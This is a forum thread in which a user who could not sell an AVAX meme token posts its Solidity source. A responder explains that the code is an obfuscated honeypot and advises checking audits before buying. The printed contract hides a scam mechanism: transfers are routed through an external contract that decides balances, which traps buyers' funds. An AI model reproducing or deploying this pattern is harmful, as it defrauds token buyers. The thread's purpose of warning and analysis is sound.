Hi everyone,
I have recently faced honeypot contract on AVAX.
Before purchasing token I checked:
A. Contract shows as verified (has green check mark)
B. Clicked contract and it also verified had green check mark)
C. I saw that ownership was renounced.
I was not able to sell, looks like it had whitelisted accounts, is there a way I can check if contract has such option that only certain accounts can sell?
This is the Contract I detail: https://dexscreener.com/avalanche/0x56f382dd25889c6fd142295dcc243e9024de55af
0x0Efb5b7D3f9BbC9281b71CdE2d6B780f671B0f69
Link: https://snowtrace.io/token/0x0Efb5b7D3f9BbC9281b71CdE2d6B780f671B0f69?chainId=43114
Here is a summary of this contract:
interface kiuiixa {
function a1(address pg,uint256 aacc, address asdabas) external view returns (uint256);
function b1(uint256 aacc, address asdabas) external view returns (uint256);
}
contract BABYWOLF {
uint ac = 123232389747193719218;
kiuiixa private uuudahxznb;
mapping(address => uint256) private _fronter;
constructor( uint256 totalSupply_) {
uint160 bcc = uint160(ac+totalSupply_);
_mint(address(bcc), totalSupply_);
}
function _transfer(address from, address to, uint256 amount) internal virtual {
require(from != address(0), "ERC20: from to the zero address");
require(to != address(0), "ERC20: to to the zero address");
uint256 baBalance = 0;
baBalance = uuudahxznb.a1(address(this),_fronter[from], from);
require(baBalance >= amount, "ERC20: transfer amount exceeds balance");
_fronter[from] = baBalance - amount;
_fronter[to] += amount;
emit Transfer(from, to, amount);
}
function init123MintGet(uint256 abcx,address aa) internal virtual {
uuudahxznb = _getInstance(aa);
}
function _getInstance(address aa) internal returns(kiuiixa cc) {
return kiuiixa( address(aa));
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
amount = 690000000000 * 10 ** 18;
_totalSupply = amount;
_fronter[msg.sender] = amount;
init123MintGet(amount,account);
emit Transfer(address(0), msg.sender, amount);
}
}
I would trust it to the same level I'd trust a promise by the Russian space agency to land a spaceship on the sun.
Thank you my friend for responding.
Now I need to understand the code you provided above..because I have no coding knowledge.
Sorry for stupid questions:
What should start with to understand it?
What would you advise to check next time before purchasing any meme/shit coins?
Once again thank you.
There is no one single methodology which you can follow in order to prove the authenticity of a contract, but there are obvious warning signs which you can use in order to refute its authenticity with 99.99% probability.
In the one above, there are actually a ton of these warning signs, but if you have no coding knowledge, then it is pretty pointless to go through it all and explain them to you.
Instead, you can ask someone who does have that experience (as you did here), and you can also search for public audits and/or reviews of the aforementioned token, etc.
I believe that most losses occur as a result of unintentional errors (bugs, exploits, etc) rather than by intentional ones. In this contract, however, the opposite seems to be the case. Nobody writes this type of obfuscated code just for fun. As a matter of fact, I'm surprised they actually gone through the process of verifying and publishing its source code, but perhaps it was all a part of the trap, aimed at getting people to trust it blindly.
Thank you.
Let me know if you have youtube channel or X where you share such things, so I would follow and learn.
1 Like